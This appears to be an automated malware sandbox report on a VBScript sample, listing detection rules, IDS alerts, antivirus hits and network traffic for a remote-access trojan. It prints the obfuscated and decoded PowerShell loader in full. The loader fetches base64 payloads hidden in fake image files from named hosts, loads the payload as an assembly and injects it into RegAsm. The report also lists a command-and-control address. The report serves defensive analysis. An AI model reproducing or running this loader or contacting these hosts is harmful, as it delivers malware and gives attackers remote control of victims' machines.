Q@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order1.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order1.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order1.vbs", ProcessId: 7616, ProcessName: wscript.exe
                Sigma detected: Usage Of Web Request Commands And Cmdlets
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.deFgIei/niam/sdaeh/sfer/wenarak/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order1.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order1.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order1.vbs", ProcessId: 7616, ProcessName: wscript.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I

                Data Obfuscation

                barindex
                Sigma detected: Powershell download and load assembly
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.deFgIei/niam/sdaeh/sfer/wenarak/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-11T19:03:40.397177+010020576351A Network Trojan was detected185.199.110.133443192.168.2.749770TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-11T19:03:31.544663+010020490381A Network Trojan was detected185.199.110.153443192.168.2.749701TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-11T19:03:40.397177+010028582951A Network Trojan was detected185.199.110.133443192.168.2.749770TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-11T19:03:41.597205+010028599111Malware Command and Control Activity Detected192.168.2.749783172.81.130.347702TCP
                2025-02-11T19:03:43.000591+010028599111Malware Command and Control Activity Detected192.168.2.749790172.81.130.347702TCP
                2025-02-11T19:03:50.041002+010028599111Malware Command and Control Activity Detected192.168.2.749836172.81.130.347702TCP
                2025-02-11T19:04:03.452511+010028599111Malware Command and Control Activity Detected192.168.2.749920172.81.130.347702TCP
                2025-02-11T19:04:16.859640+010028599111Malware Command and Control Activity Detected192.168.2.749975172.81.130.347702TCP
                2025-02-11T19:04:18.290955+010028599111Malware Command and Control Activity Detected192.168.2.749977172.81.130.347702TCP
                2025-02-11T19:04:19.779614+010028599111Malware Command and Control Activity Detected192.168.2.749978172.81.130.347702TCP
                2025-02-11T19:04:23.692869+010028599111Malware Command and Control Activity Detected192.168.2.749979172.81.130.347702TCP
                2025-02-11T19:04:25.263204+010028599111Malware Command and Control Activity Detected192.168.2.749980172.81.130.347702TCP
                2025-02-11T19:04:32.278171+010028599111Malware Command and Control Activity Detected192.168.2.749981172.81.130.347702TCP
                2025-02-11T19:04:33.687961+010028599111Malware Command and Control Activity Detected192.168.2.749982172.81.130.347702TCP
                2025-02-11T19:04:47.346344+010028599111Malware Command and Control Activity Detected192.168.2.749983172.81.130.347702TCP
                2025-02-11T19:04:48.748038+010028599111Malware Command and Control Activity Detected192.168.2.749984172.81.130.347702TCP
                2025-02-11T19:04:52.707064+010028599111Malware Command and Control Activity Detected192.168.2.749985172.81.130.347702TCP
                2025-02-11T19:04:54.145525+010028599111Malware Command and Control Activity Detected192.168.2.749986172.81.130.347702TCP
                2025-02-11T19:04:58.095121+010028599111Malware Command and Control Activity Detected192.168.2.749987172.81.130.347702TCP
                2025-02-11T19:05:11.595035+010028599111Malware Command and Control Activity Detected192.168.2.749988172.81.130.347702TCP
                2025-02-11T19:05:15.539810+010028599111Malware Command and Control Activity Detected192.168.2.749989172.81.130.347702TCP
                2025-02-11T19:05:17.079649+010028599111Malware Command and Control Activity Detected192.168.2.749990172.81.130.347702TCP
                2025-02-11T19:05:18.566665+010028599111Malware Command and Control Activity Detected192.168.2.749991172.81.130.347702TCP
                2025-02-11T19:05:19.983099+010028599111Malware Command and Control Activity Detected192.168.2.749992172.81.130.347702TCP
                2025-02-11T19:05:21.393696+010028599111Malware Command and Control Activity Detected192.168.2.749993172.81.130.347702TCP
                2025-02-11T19:05:22.915914+010028599111Malware Command and Control Activity Detected192.168.2.749994172.81.130.347702TCP
                2025-02-11T19:05:24.283174+010028599111Malware Command and Control Activity Detected192.168.2.749995172.81.130.347702TCP
                2025-02-11T19:05:25.814606+010028599111Malware Command and Control Activity Detected192.168.2.749996172.81.130.347702TCP
                2025-02-11T19:05:27.269279+010028599111Malware Command and Control Activity Detected192.168.2.749997172.81.130.347702TCP
                2025-02-11T19:05:31.174192+010028599111Malware Command and Control Activity Detected192.168.2.749998172.81.130.347702TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: https://ofice365.github.io/1/test.jpgAvira URL Cloud: Label: malware
                Source: https://ofice365.github.ioAvira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: Order1.vbsVirustotal: Detection: 19%Perma Link
                Source: Order1.vbsReversingLabs: Detection: 16%
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.110.153:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49770 version: TLS 1.2
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: RegAsm.exe, 00000007.00000002.2586589024.0000000003023000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2618327273.00000000057E0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000004035000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: RegAsm.exe, 00000007.00000002.2586589024.0000000003023000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2618327273.00000000057E0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000004035000.00000004.00000800.00020000.00000000.sdmp

                Software Vulnerabilities

                barindex
                Suspicious execution chain found
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49783 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49920 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49790 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49975 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49836 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49987 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49986 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49983 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49995 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49978 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49980 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49990 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49984 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49993 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49985 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49997 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49989 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49996 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49991 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49988 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49977 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49979 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49981 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49998 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49994 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49982 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2859911 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.7:49992 -> 172.81.130.34:7702
                Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 185.199.110.133:443 -> 192.168.2.7:49770
                Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 185.199.110.133:443 -> 192.168.2.7:49770
                Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 185.199.110.153:443 -> 192.168.2.7:49701
                Source: global trafficHTTP traffic detected: GET /ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /1/test.jpg HTTP/1.1Host: ofice365.github.ioConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /richie213/karanew/refs/heads/main/ieIgFed.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 185.166.143.50 185.166.143.50
                Source: Joe Sandbox ViewIP Address: 185.199.110.133 185.199.110.133
                Source: Joe Sandbox ViewIP Address: 185.199.110.133 185.199.110.133
                Source: Joe Sandbox ViewASN Name: DATAWAGONUS DATAWAGONUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
